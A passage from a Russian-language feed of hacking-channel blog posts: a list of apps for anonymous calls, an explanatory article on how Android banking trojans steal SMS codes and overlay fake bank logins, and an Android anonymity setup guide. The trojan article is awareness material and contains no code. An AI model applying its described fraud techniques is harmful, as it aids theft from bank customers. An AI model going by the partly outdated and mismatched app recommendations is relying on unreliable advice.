  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry><entry><id>darksoft:faLuI-ardp</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/faLuI-ardp?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Звонки без SIM карты</title><published>2020-06-23T12:26:52.683Z</published><updated>2020-06-23T12:26:52.683Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/59/70/59703177-ae20-4da9-aaec-23866a0ed307.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/50/b7/50b7cf59-20ac-41f7-97c6-2c37566ef190.jpeg&quot;&gt;Возможно, у вас бывали такие ситуации, когда нужно было позвонить человеку и при этом всём остаться полностью анонимным и не спалить свой номер. Использование SIM карты идентифицирует вас c ближайшей к вам сотовой вышкой, скажу вам так если вы используете левую сим и звоните кому-либо с помощью непроверенных сервисов для звонков, то скорее всего вам не получиться остаться анонимным в сети и ваш трафик не зашифрован и нет толку от такой сим-карты, место где вы находитесь смогут отследить.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/50/b7/50b7cf59-20ac-41f7-97c6-2c37566ef190.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Возможно, у вас бывали такие ситуации, когда нужно было позвонить человеку и при этом всём остаться полностью анонимным и не спалить свой номер. Использование SIM карты идентифицирует вас c ближайшей к вам сотовой вышкой, скажу вам так если вы используете левую сим и звоните кому-либо с помощью непроверенных сервисов для звонков, то скорее всего вам не получиться остаться анонимным в сети и ваш трафик не зашифрован и нет толку от такой сим-карты, место где вы находитесь смогут отследить.&lt;/p&gt;
  &lt;p&gt;В связи с этим, хочу с вами поделиться сервисами для звонков. у которых весь трафик проходит через сеть TOR или просто имеет высокую степень шифрования в сети.&lt;/p&gt;
  &lt;p&gt;Список сайтов:&lt;/p&gt;
  &lt;p&gt;1. TOX (https://tox.chat/)&lt;/p&gt;
  &lt;p&gt;2. Linphone (https://www.linphone.org/)&lt;/p&gt;
  &lt;p&gt;3. jitsi (https://jitsi.org/)&lt;/p&gt;
  &lt;p&gt;4. Ring (https://www.ringcentral.com/)&lt;/p&gt;
  &lt;p&gt;5. Mumblen (https://www.mumble.com/)&lt;/p&gt;
  &lt;p&gt;Лично я сам использовал для анонимных звонков последний сервис и могу порекомендовать вам именно его, но главное, что выбор за вами. Рассказывать вам про каждый сервис, смысла я не вижу, потому что всю подробную информацию можно найти на этих сайтах, которые я указал выше. Может вам и пригодится, то что я вам рассказал.&lt;/p&gt;
  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry><entry><id>darksoft:n2hV7USVt</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/n2hV7USVt?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Как защититься от банковских троянов?</title><published>2020-06-22T10:41:09.138Z</published><updated>2020-06-22T10:41:09.138Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/35/ff/35ffc8a6-16d4-474c-bbed-2a5113b62439.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/bf/bc/bfbcd060-0040-4c5f-b1f5-24a0cc3ba5f7.jpeg&quot;&gt;Одним утром мне позвонил друг, занимающийся перевозкой грузов. Нервным голосом он рассказал, что с его банковского счета куда-то пропали 2 миллиона рублей. А в службе поддержки банка развели руками, отправив товарища писать заявление в полицию, поскольку денежные переводы были совершены с помощью мобильного приложения и подтверждены через SMS, что по всем признакам выглядит вполне легальной финансовой операции.</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/bf/bc/bfbcd060-0040-4c5f-b1f5-24a0cc3ba5f7.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Одним утром мне позвонил друг, занимающийся перевозкой грузов. Нервным голосом он рассказал, что с его банковского счета куда-то пропали 2 миллиона рублей. А в службе поддержки банка развели руками, отправив товарища писать заявление в полицию, поскольку денежные переводы были совершены с помощью мобильного приложения и подтверждены через SMS, что по всем признакам выглядит вполне легальной финансовой операции.&lt;/p&gt;
  &lt;p&gt;«Ты же программист, — простонал в трубку мой друг, — посоветуй, что делать». К сожалению, что-то делать было уже поздно, ибо инструментом для кражи денег послужил банковский троян (банкер), обосновавшийся на телефоне моего приятеля задолго до этого досадного инцидента. И предотвратить пропажу денег было можно, лишь заранее изучив принципы работы и методы борьбы с таким видом вредоносных приложений. Чем мы в сегодняшней статье и займемся.&lt;/p&gt;
  &lt;h3&gt;Банковские трояны раньше&lt;/h3&gt;
  &lt;p&gt;Первые полноценные банковские трояны для мобильной платформы Android были обнаружены еще в 2011 году. Нет, вредоносы, способные передавать злоумышленникам входящие SMS-сообщения, в том числе содержащие mTAN-коды (коды аутентификации транзакций), существовали и до этого. Кроме того, были известны трояны, умеющие оперировать USSD-командами. Они могли перевести заданную злодеями сумму с «привязанной» к телефону банковской карты, пополнив баланс левого мобильного телефона, или узнать остаток средств на счете. Но полноценными банковскими троянами, конечно же, не были, поскольку заметно уступали по функциональным возможностям своим десктопным аналогам.&lt;/p&gt;
  &lt;p&gt;Все изменилось с появлением Android.SpyEye. Этот трой работал в связке с вредоносом SpyEye для Windows, благодаря чему обрел способность обходить двухфакторную аутентификацию. Действовал он следующим образом.&lt;/p&gt;
  &lt;p&gt;Как только пользователь зараженной винды открывал в браузере банковский сайт, работающий на компе трой выполнял веб-инжект, встраивая в страницу кусок HTML-кода, который он подгружал из конфига. Поскольку инжект осуществлялся на стороне клиента, URL банковского сайта в адресной строке браузера оказывался корректным, а соединение было установлено по протоколу HTTPS. Поэтому содержимое веб-страницы не вызывало у жертвы никаких подозрений.&lt;/p&gt;
  &lt;p&gt;Текст, встроенный трояном в банковский сайт, гласил, что банк внезапно изменил условия работы и для авторизации в системе банк-клиент необходимо установить на мобильный телефон небольшое приложение размером около 30 Кбайт, скачав его по предложенной ссылке — «в целях безопасности». Приложением, естественно, был мобильный трой Android.SpyEye.&lt;/p&gt;
  &lt;p&gt;Эта вредоносная программа не создавала никаких значков, ее можно было отыскать только в списке работающих процессов под названием «Система». Основная задача троя — перехват всех входящих SMS-сообщений и пересылка их на управляющий сервер, адрес которого вредонос брал из XML-конфига.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-1.png&quot; width=&quot;604&quot; /&gt;
    &lt;figcaption&gt;Так выглядел один из первых мобильных банковских троянов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Когда жертва вводит логин и пароль на банковском сайте в окне браузера, Windows-троян SpyEye перехватывает и отправляет их ботоводам. После этого злоумышленники в любой момент могут авторизоваться с помощью этих данных в системе банк-клиент на сайте банка, однако сервер обязательно отправит владельцу счета проверочный код в SMS, который нужно ввести в специальную форму. Это сообщение будет перехвачено мобильной версией SpyEye и передано вирусописателям. Используя перехват SMS, они смогут выполнять любые операции по счету, например опустошить его подчистую.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-1.jpg&quot; width=&quot;924&quot; /&gt;
    &lt;figcaption&gt;Примерно так выглядит схема работы первого мобильного банковского трояна SpyEye&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Узким местом этой довольно сложной схемы была необходимость синхронизации работы банковского и десктопного компонентов троянской связки, однако указанную проблему вирусописателям удалось успешно решить. Несколько месяцев SpyEye наводил шорох среди пользователей банковских сервисов, пока не попал в базы всех популярных антивирусов, после чего его деятельность постепенно сошла на нет.&lt;/p&gt;
  &lt;h3&gt;Банковские трояны сегодня&lt;/h3&gt;
  &lt;p&gt;Спустя какое-то время сотрудники IT-отделов банков понемногу освоили веб-программирование, и банк-клиенты окончательно перекочевали с десктопов в мобильные телефоны в виде Android-приложений. Это значительно облегчило жизнь вирусописателям: у них отпала необходимость заморачиваться с троянами под винду, и они смогли наконец полностью сосредоточить свои усилия на разработке мобильных банковских троянов. Ведь владелец Android-смартфона с банковским приложением на борту — это ходячий кошелек, опустошить который мечтает каждый уважающий себя вирмейкер.&lt;/p&gt;
  &lt;p&gt;Как и прочие вредоносы для Android, банковские трояны распространялись под видом каких-либо полезных программ — «универсальных видеокодеков» или проигрывателей Flash, в том числе через официальный каталог Google Play. Троянская функциональность таких приложений, естественно, не афишировалась разработчиками, и проявлялась она либо спустя какое-то время, либо после загрузки очередного обновления. Так, в одном из случаев банковский троян раздавался в виде программы, якобы объединяющей в себе возможности банк-клиентов сразу нескольких крупных кредитных организаций. Зачем вам куча отдельных приложений, когда вместо них можно скачать одно, с трояном? Также известны случаи, когда вредоносы встраивались в подлинные приложения некоторых банков, модифицированные злоумышленниками. Такие приложения распространялись с поддельных страниц банков, оформленных в точности как настоящие, а жертв на них завлекали рассылками фишинговых писем.&lt;/p&gt;
  &lt;p&gt;Еще один вектор распространения мобильных банковских троянов — фишинговые SMS-рассылки. Обычно это происходит так. Пользователю, зарегистрированному на одном из сайтов бесплатных объявлений, приходит SMS-сообщение с предложением обмена. При этом получателя называют по имени, что должно усыпить его бдительность, — вирусописатели предварительно распарсили базу пользователей этого сайта, вытянув оттуда всю полезную информацию. При переходе по короткой ссылке из сообщения потенциальная жертва направляется на промежуточную страницу, где определяется, что пользователь зашел на сайт именно с мобильного устройства под управлением Android, и выявляется его мобильный оператор, после чего происходит перенаправление на фейковую страницу с сообщением о поступлении MMS, оформленную в стилистике соответствующего ОПСОСа. После нажатия на кнопку начинается загрузка трояна.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-2.png&quot; width=&quot;607&quot; /&gt;
    &lt;figcaption&gt;Пример фишинговой SMS-рассылки, цель которой — распространение банковского трояна&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Первые мобильные банковские трояны работали очень просто. Если для функционирования вредоноса были нужны права администратора, он настойчиво демонстрировал на экране окно с требованием выдать ему соответствующие полномочия, до тех пор пока измученный пользователь не согласится на это действие. Но иногда вирусописатели шли на различные ухищрения, чтобы обмануть потенциальную жертву. Например, банковский троян Android.BankBot.29 маскировал окно запроса прав администратора под сообщение приложения Google Play: «Ваша версия устарела, использовать новую версию?» При попытке пользователя нажать на экранную кнопку «Да» layout трояна исчезал, и тап попадал на кнопку Accept диалогового окна DeviceAdmin, в результате чего вредонос получал администраторские привилегии.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-3.png&quot; width=&quot;605&quot; /&gt;
    &lt;figcaption&gt;Получить админские права для Android-трояна не просто, а очень просто&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Еще один банковский троян доставал пользователей запросом на включение режима Accessibility Service — специальных возможностей для людей с ограничениями по здоровью. А получив такое разрешение, сам включал для себя админа.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-4.png&quot; width=&quot;606&quot; /&gt;
    &lt;figcaption&gt;Другой способ получения привилегий — Accessibility Service&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;После этого трой просто висит в памяти мобильного телефона, ожидая запуска мобильного банковского приложения. При наступлении этого события он определяет, какое именно приложение запущено, и рисует поверх него соответствующую поддельную форму ввода логина и пароля, а введенные данные тут же пересылаются на управляющий сервер по HTTP в виде JSON или на заданный телефонный номер SMS-сообщением. Конфиг мобильного банковского трояна может содержать HTML-код нескольких десятков форм с различным оформлением, копирующим интерфейс приложений наиболее популярных банков. После этого остается только перехватить и отправить в том же направлении SMS с одноразовыми паролями, чтобы предоставить ботоводам полный доступ к банковскому счету. Входящие сообщения от банков при этом обычно скрываются, чтобы не вызывать у жертвы подозрений.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-5.png&quot; width=&quot;605&quot; /&gt;
    &lt;figcaption&gt;Поддельное окно мобильного банкинга&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-6.png&quot; width=&quot;604&quot; /&gt;
    &lt;figcaption&gt;Мобильные банковские трояны могут рисовать поддельные окна авторизации популярных банков&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сколько денег подобным образом было похищено со счетов пользователей Android, сказать трудно, но суммы здесь наверняка фигурируют шестизначные. Даже если троянам по какой-то причине не удавалось получить доступ к банковскому счету, они благополучно похищали реквизиты банковских карт. Для этого, например, широко использовались фейковые окна привязки карты к приложению Google Play.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-7.png&quot; width=&quot;605&quot; /&gt;
    &lt;figcaption&gt;Для хищения реквизитов банковских карт многие банковские трояны используют поддельные окна Google Play&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Приобрести что-либо ценное в приличных интернет-магазинах с использованием ворованных реквизитов непросто, а вот оплатить онлайн-игрушки или покупку музыки в каком-нибудь сервисе вполне возможно. Подобные сайты редко заморачиваются серьезной проверкой платежных реквизитов, поскольку транзакции там обычно копеечные. Чем и пользуются злоумышленники.&lt;/p&gt;
  &lt;h3&gt;Банкботы — разновидность банковского трояна&lt;/h3&gt;
  &lt;p&gt;Банкботы — это побочная ветвь эволюции мобильных банковских троянов. Если обычные банковские трои работают более-менее автономно, то банкботы способны получать различные управляющие команды и выполнять их на зараженном девайсе.&lt;/p&gt;
  &lt;p&gt;Команды могут передаваться по HTTP, например в формате JSON, по SMS, а в некоторых случаях даже через специальный Telegram-канал. Большинство банкботов по команде включают или отключают перехват входящих SMS-сообщений, могут скрывать полученные SMS (прятать можно сообщения с определенных номеров или с заданными ключевыми словами), отключать звук мобильного телефона, отправлять сообщения на указанный злоумышленниками номер с заданным содержимым или выполнять USSD-команды. Также ботовод может изменить адрес управляющего сервера или системный номер телефона, на который будет пересылаться информация, если ее не удалось передать по HTTP.&lt;/p&gt;
  &lt;p&gt;Многие банкботы также могут скачивать и устанавливать на мобильном устройстве APK-файлы, ссылку на которые укажет в команде ботовод. В результате на зараженный девайс попадают другие трояны, имеющие более широкий ассортимент функций. Также некоторые банкботы умеют отображать на экране смартфона активити с присланными злодеем параметрами — это открывает широчайшие возможности для фишинга и реализации самых изощренных мошеннических схем. Ну и почти все такие вредоносы умеют сливать на командный сервер адресную книгу, SMS-переписку и прочие конфиденциальные данные, а также переадресовывать входящие звонки на заданный в команде телефонный номер. Отдельные экземпляры троянов ко всему прочему обладают функциями самозащиты: они отслеживают имена работающих в системе процессов и при обнаружении антивируса пытаются выгрузить его, используя права администратора.&lt;/p&gt;
  &lt;p&gt;Практически все банкботы используют веб-админку, предоставляющую ботоводам подробную статистику по инфицированным девайсам и похищенной на них информации.&lt;/p&gt;
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-8.png&quot; width=&quot;832&quot; /&gt;
    &lt;figcaption&gt;Админка мобильного банковского бота&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-9.png&quot; width=&quot;840&quot; /&gt;
    &lt;figcaption&gt;Админка мобильного банковского бота&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-10.png&quot; width=&quot;840&quot; /&gt;
    &lt;figcaption&gt;Админка типичного мобильного банковского бота&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Распространение банковских троянов&lt;/h3&gt;
  &lt;p&gt;С распространением мобильных устройств на Android производство троянов для этой платформы стало понемногу превращаться в самую настоящую подпольную индустрию. В полной мере коснулось это и банкеров.&lt;/p&gt;
  &lt;p&gt;В даркнете стали появляться объявления о сдаче банковских троянов под Android в аренду, с предоставлением клиенту админки и технической поддержки. А затем начали распространяться билдеры, с использованием которых любой желающий без каких-либо навыков программирования мог соорудить банковского трояна, маскирующегося под выбранное приложение или определенную систему банк-клиент.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/banking-trojans-11.png&quot; width=&quot;668&quot; /&gt;
    &lt;figcaption&gt;Билдер для создания банковского троя под Android&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Благодаря этому количество банковских троев примерно с 2017 года начало расти если не в геометрической прогрессии, то весьма заметно. И шансы подцепить подобную заразу у пользователей смартфонов на Android тоже значительно выросли. А с учетом того, что большинство подобных вредоносов работает с привилегиями администратора, удалить их с устройства не так-то просто: для этого в лучшем случае придется запустить систему в безопасном режиме, в худшем — сбросить девайс к заводским настройкам со всеми вытекающими последствиями.&lt;/p&gt;
  &lt;h3&gt;Защита от банковского трояна&lt;/h3&gt;
  &lt;p&gt;Доказанный факт: даже отключение на телефоне возможности установки приложений из сторонних источников далеко не всегда защищает пользователя от проникновения банкеров. Случаев загрузки подобных вредоносов даже из официального каталога Google Play известно множество: технология проверки размещаемых там приложений все еще несовершенна.&lt;/p&gt;
  &lt;p&gt;Кроме того, операционную систему Android отличает значительное количество уязвимостей, которые могут использоваться вирусописателями в своих, отнюдь не благородных целях. Защитить устройство от несанкционированного проникновения зловредов способны антивирусы, но вот устанавливать их или нет — личное дело самих пользователей Android. По крайней мере, мой приятель-коммерсант после инцидента с похищением денег решил больше не испытывать судьбу и скачал на свой телефон такую программу: лишней не будет.&lt;/p&gt;
  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry><entry><id>darksoft:WXkrAr669</id><link rel="alternate" type="text/html" href="https://teletype.in/@darksoft/WXkrAr669?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=darksoft"></link><title>Анонимный Android</title><published>2020-06-22T10:36:36.679Z</published><updated>2020-06-22T10:36:36.679Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/89/fc/89fc5773-9d82-4123-8203-d32eda65e516.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/96/3e/963e693d-8fe4-46b9-a64d-966609c713f9.jpeg&quot;&gt;Более чем в половине всех устройств на базе Android зияет огромная дыра в безопасности. Сегодня мы попробуем закрыть эту дыру, и в целом анонимизировать систему, используя полезные приложения и решения, о которых я расскажу ниже!</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/96/3e/963e693d-8fe4-46b9-a64d-966609c713f9.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Более чем в половине всех устройств на базе Android зияет огромная дыра в безопасности. Сегодня мы попробуем закрыть эту дыру, и в целом анонимизировать систему, используя полезные приложения и решения, о которых я расскажу ниже!&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Comodo Mobile Security&lt;/strong&gt; - одно из самых функциональных и гибко настраиваемых приложений для бесплатной защиты мобильных устройств на базе Андроид. Кроме типичного набора антивирусных модулей, в нём есть такие дополнения, как менеджер трафика,показывающий в реальном времени всю сетевую активность всех активных приложений: в сотовых 3G/4G сетях и при подключении по Wifi. С правами администратора (Суперпользователя)в менеджере трафика есть возможность использовать простой программный фаервол(межсетевой экран).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Clean Master&lt;/strong&gt; - удаление следов работы и антивирус.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt; History Eraser&lt;/strong&gt; - ещё одна программа для удаления следов работы.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Orbot&lt;/strong&gt; - Tor для Android.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt; ProxyDroid&lt;/strong&gt; - настройка прокси на Android устройстве.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Smart App Lock&lt;/strong&gt; - защита приложений паролем, а также защита соединений (блокировка подключений к интернету, работы с внешним USB-накопителем,исходящих телефонных вызовов).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;SSH Tunnel Android&lt;/strong&gt; - SSH туннелирование для Android.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;TunnelBear VPN&lt;/strong&gt; - позволяет скрыть свой IP с помощью технологий VPN.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;TextSecure Private Messenger&lt;/strong&gt; - мессенджер с защищенной перепиской.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;RedPhone Private Calls&lt;/strong&gt; - мессенджер для защищенной переписки и интернет - телефонии.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Cryptocat&lt;/strong&gt; - сервис как для мобильного телефона, так и для ПК. У него есть собственные дополнения для браузеров Firefox, Chrome, Safari и Opera, предназначенная для быстрого доступа к чату. Чат предлагается групповой, причем можно устроить переписку с помощью сервера Cryptocat или же переместиться на другой сервер.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;NoRoot Firewall&lt;/strong&gt; - фаервол без Root-прав.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Viaprotect&lt;/strong&gt; - приложение для проверки защищенности смартфона, контроля трафика, скачивать нужно с официального сайта разработчиков&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Shark&lt;/strong&gt; - для профессионалов рекомендую этот сниффер сетевого трафика. Сниффер записывает логи в формате .pcap и хранит их на SD-карте телефона. Файл с логами можно просмотреть на Windows, так и в самом телефоне, при помощи утилиты Shark Reader.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;CyanogenMod&lt;/strong&gt; - кастомная прошивка с открытым исходным кодом, в отличии от других альтернативных прошивок, работает на большинстве устройств. Лично я советую использовать именно её, ниже прикреплю статью по одной из возможных сборок для анонимности на этой базе.&lt;/p&gt;
  &lt;p&gt;Программное обеспечение и инструкции можно найти на cyanogenmod.org&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;OmniROM&lt;/strong&gt; - ответвление от проекта CyanogenMod, базируется на Android 4.4. Поддерживается некоторыми моделями Samsung, HTC, LG. Информацию по установке и ссылки на загрузки ищите на &lt;a href=&quot;http://omnirom.org/&quot; target=&quot;_blank&quot;&gt;omnirom.org&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Paranoid Android&lt;/strong&gt; - даёт много возможностей настройки внешнего вида графического интерфейса пользователя. Официально работает примерно с 20 устройствами,неофициально - примерно с 60. Сайт разработчика &lt;a href=&quot;http://aospa.co/&quot; target=&quot;_blank&quot;&gt;aospa.co&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt; SlimROMs&lt;/strong&gt; - для пользователей,предпочитающих максимальную производительность всякому украшательству. Актуальные версии прошивок вместе с инструкциями по установке, ищите на &lt;a href=&quot;http://slimroms.net/&quot; target=&quot;_blank&quot;&gt;slimroms.net&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Понятно, что бороться с утечками в смартфонах, основанных на проприетарных операционных системах, — занятие неблагодарное. Нет открытых исходников — нет доказательств отсутствия скрытых закладок. Чтобы получить хоть сколько-нибудь анонимизированный смартфон, нам понадобится гугл-фон. И не просто гуглофон, а тот, для которого есть официальная версия последней прошивки &lt;strong&gt;CyanogenMod&lt;/strong&gt; и открытые исходники ядра (стоковая прошивка или ядро Android-смартфона также могут содержать бэкдоры).&lt;/p&gt;
  &lt;p&gt;Когда эти требования будут выполнены, берем смартфон в руки, получаем root - права (как это сделать,можно найти в интернете), регистрируемся в Google Play, устанавливаем приложение &lt;strong&gt;ROM Installer&lt;/strong&gt; и прошиваем с его помощью CyanogenMod. Обязательно отказываемся от установки Google Apps. Их придется принести в жертву великому богу конфиденциальности. После первой загрузки CyanogenMod предложит зарегистрировать или подключить аккаунт CM, а также включить отправку анонимной статистики. Разумеется, от выполнения этих процедур, следует отказаться. Далее приступим к начальной настройке прошивки.&lt;/p&gt;
  &lt;p&gt;Идем в настройки и отмечаем следующие пункты:&lt;/p&gt;
  &lt;ol&gt;
    &lt;li&gt;Беспроводные сети ==&amp;gt; Еще ==&amp;gt; NFC ==&amp;gt; Отключить.&lt;/li&gt;
    &lt;li&gt;Безопасность ==&amp;gt; Блокировка экрана ==&amp;gt; PIN-код.&lt;/li&gt;
    &lt;li&gt;Безопасность ==&amp;gt; Неизвестные источники.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;Ничего особенного, стандартные опции. Потом нам следует обезопасить себя от утечек данных из предустановленных приложений и софта, который будет установлен позже. В CyanogenMod для этого есть механизм Privacy Guard, который занимается обфускацией личных данных пользователя, подсовывая вместо них рандомные данные: случайно сгенерированное имя юзера вместо реального, случайные координаты и прочее. Чтобы его активировать, идем в Настройки - Конфиденциальность - Защищенный режим и включаем опцию Защищенный режим по умолчанию. Теперь он будет активироваться для всех устанавливаемых приложений. Чтобы активировать &lt;strong&gt;Privacy Guard&lt;/strong&gt; для стоковых приложений, нажимаем кнопку настроек сверху (три точки), отмечаем опцию «Системные приложения» и выбираем все приложения, кроме Trebuchet (это рабочий стол). По умолчанию Privacy Guard настроен таким образом, чтобы спрашивать юзера каждый раз, когда приложение пытается получить доступ к личным данным. Разрешать это действие стоит только в том случае, если такие данные ему реально нужны (например, телефон пытается прочитать адресную книгу). На этом все, надеюсь, что вам пригодится данная информация!&lt;/p&gt;
  &lt;h3&gt;&lt;u&gt;&lt;a href=&quot;https://t.me/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;HIDDEN COMMUNITY&lt;/a&gt;&lt;/u&gt; - информационная безопасность, хакинг, полезные статьи (&lt;u&gt;&lt;a href=&quot;https://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ&quot; target=&quot;_blank&quot;&gt;зеркало&lt;/a&gt;&lt;/u&gt;)&lt;/h3&gt;

</content></entry></feed>